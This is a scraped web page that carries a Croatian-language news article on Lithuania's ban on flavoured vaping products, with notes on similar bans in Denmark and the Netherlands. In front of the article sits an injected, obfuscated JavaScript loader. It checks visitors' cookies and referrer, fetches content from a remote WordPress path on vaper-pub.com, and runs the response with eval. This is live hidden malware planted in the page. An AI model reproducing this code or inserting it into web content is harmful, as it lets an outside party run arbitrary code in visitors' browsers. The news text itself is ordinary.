;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Litvanska zabrana aroma stupa na snagu 1. srpnja

Litvanski Seimas (parlament) dovršio je zakon koji zabranjuje prodaju proizvoda za vaping bez duhana. Zabrana okusa odnosi se na sve proizvode, uključujući i one koji ne sadrže nikotin.

Novi zakon kojim se mijenja postojeći Zakon o kontroli duhana, duhanskih proizvoda i srodnih proizvoda u zemlji, usvojen je s 92 za i 9 suzdržanih, navodi LRT. Zabrana će stupiti na snagu 1. srpnja ove godine.

Još je prošle godine litvanska vlada obavijestila Europsku uniju o svojoj namjeri da zabrani okuse i dopustila javno komentiranje svog nacrta zakona do 11. listopada 2021. Seimas je započeo raspravu o zabrani okusa 2020. Zakonodavci su odlučili zabraniti arome u beznikotinskoj e-tekućini kako bi se spriječilo da vaperi koriste nikotinske shotove ili slične proizvode kako bi zaobišli namjeru zakona.

Litva postaje sedma europska zemlja koja je prošla zabranu okusa. Estonija, Finska, Mađarska i Ukrajina trenutno imaju ograničenja u pogledu okusa. Zabrana okusa stupit će na snagu u Danskoj u travnju i Nizozemskoj u srpnju. Nijedna europska država nema potpunu zabranu prodaje svih vape proizvoda.

Litva se nalazi između Latvije, Bjelorusije i Poljske, te je jedna od najmanjih zemalja EU s nešto manje od tri milijuna stanovnika. Oko 28 posto odraslih Litve puši cigarete – jedna od najviših stopa pušenja u EU.

Slijede zabrane u Danskoj i Nizozemskoj

Danska ispunjava svoje obećanje da će od sljedeće godine zabraniti aromatizirane proizvode za vaping. Danski parlament odobrio je 15. prosinca “Akcijski plan za duhan” Danske zdravstvene uprave.

Nova pravila zabranjuju proizvodnju e-tekućina u okusima osim duhana i mentola nakon 1. travnja 2021., ali se mogu prodavati godinu dana, do 1. travnja 2022.

Danska je već najavila porez na e-tekućine od 2,00 danskih kruna (oko 0,32 USD) po mililitru, koji će stupiti na snagu ove godine. Prema Dansk e-Damper Forening (DADAFO), danskoj grupi potrošača za vaping, porez će povećati cijenu tipične boce od 10 mL (maksimalna zakonska veličina boce u EU) e-soka od 30 kruna do 50 kruna (oko 8,25 dolara).

Kada proizvodi za vaping koštaju gotovo koliko i cigarete, to eliminira jednu od najvažnijih konkurentskih prednosti e-cigareta.

U Nizozemskoj je vlada odobrila zabranu okusa koja je dugo prijetila, unatoč velikom protivljenju potrošača. No, zagovornici vapinga kažu da se zakon, koji bi trebao stupiti na snagu 1. srpnja 2022., još uvijek može zaustaviti.

Zabranu okusa još uvijek mora odobriti novi Zastupnički dom, od kojih su mnogi novoizabrani i nisu upoznati s tim pitanjem. Ako Dom proglasi to pitanje “kontroverznim”, odluku će ponovno razmotriti nova vlada kada bude formirana.

Koristeći namjensku web stranicu pod nazivom Smaak Noodzaak („potreban okus“), nizozemski zagovornici potrošača Acvoda i trgovačka organizacija Esigbond surađuju kako bi potaknuli vapere da podijele svoje priče o prestanku pušenja s nizozemskim političkim strankama i članovima parlamenta, i na Twitteru i putem e-pošte. Cilj je da tisuće potrošača vapinga poručuju dojmljivim novim predstavnicima dok je vlada u promjenama.

Choose your Reaction!
Leave a Comment